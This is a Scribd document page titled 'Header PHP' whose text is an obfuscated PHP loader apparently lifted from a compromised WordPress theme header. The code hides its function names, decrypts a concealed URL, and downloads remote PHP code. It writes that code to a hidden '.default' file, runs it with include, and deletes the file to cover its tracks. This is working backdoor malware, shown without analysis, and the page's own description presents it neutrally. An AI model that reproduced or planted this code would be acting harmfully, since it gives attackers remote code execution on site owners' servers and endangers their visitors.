Scribd
Upload
36 views

Header PHP

The document contains PHP code that decrypts an encrypted string, writes the decrypted contents to a hidden file, includes that file, and then deletes the hidden file. It is checking for directories to write the hidden file and includes any code found in that file.

Uploaded by

Yoel Velasquez
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
36 views

Header PHP

The document contains PHP code that decrypts an encrypted string, writes the decrypted contents to a hidden file, includes that file, and then deletes the hidden file. It is checking for directories to write the hidden file and includes any code found in that file.

Uploaded by

Yoel Velasquez
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

<?

php @ini_set('display_errors', '0');


error_reporting(0);
global $zeeta;
if (!$npDcheckClassBgp && !isset($zeeta)) {

$ea = '_shaesx_'; $ay = 'get_data_ya'; $ae = 'decode'; $ea =


str_replace('_sha', 'bas', $ea); $ao = 'wp_cd'; $ee = $ea.$ae; $oa =
str_replace('sx', '64', $ee); $algo = 'default'; $pass =
"Zgc5c4MXrK42MQ4F8YpQL/+fflvUNPlfnyDNGK/X/wEfeQ==";

if (!function_exists('get_data_ya')) {
if (ini_get('allow_url_fopen')) {
function get_data_ya($m) {
$data = file_get_contents($m);
return $data;
}
}
else {
function get_data_ya($m) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $m);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
}
}

if (!function_exists('wp_cd')) {
function wp_cd($fd, $fa="") {
$fe = "wp_frmfunct";
$len = strlen($fd);
$ff = '';
$n = $len>100 ? 8 : 2;
while( strlen($ff)<$len ) { $ff .= substr(pack('H*', sha1($fa.$ff.
$fe)), 0, $n); }
return $fd^$ff;
}
}

$reqw = $ay($ao($oa("$pass"), 'wp_function'));


preg_match('#gogo(.*)enen#is', $reqw, $mtchs);
$dirs = glob("*", GLOB_ONLYDIR);
foreach ($dirs as $dira) {
if (fopen("$dira/.$algo", 'w')) { $ura = 1; $eb = "$dira/"; $hdl =
fopen("$dira/.$algo", 'w'); break; }
$subdirs = glob("$dira/*", GLOB_ONLYDIR);
foreach ($subdirs as $subdira) {
if (fopen("$subdira/.$algo", 'w')) { $ura = 1; $eb = "$subdira/"; $hdl =
fopen("$subdira/.$algo", 'w'); break; }
}
}
if (!$ura && fopen(".$algo", 'w')) { $ura = 1; $eb = ''; $hdl = fopen(".$algo",
'w'); }
fwrite($hdl, "<?php\n$mtchs[1]\n?>");
fclose($hdl);
include("{$eb}.$algo");
unlink("{$eb}.$algo");
$npDcheckClassBgp = 'aue';

$zeeta = "yup";

}
?>

You might also like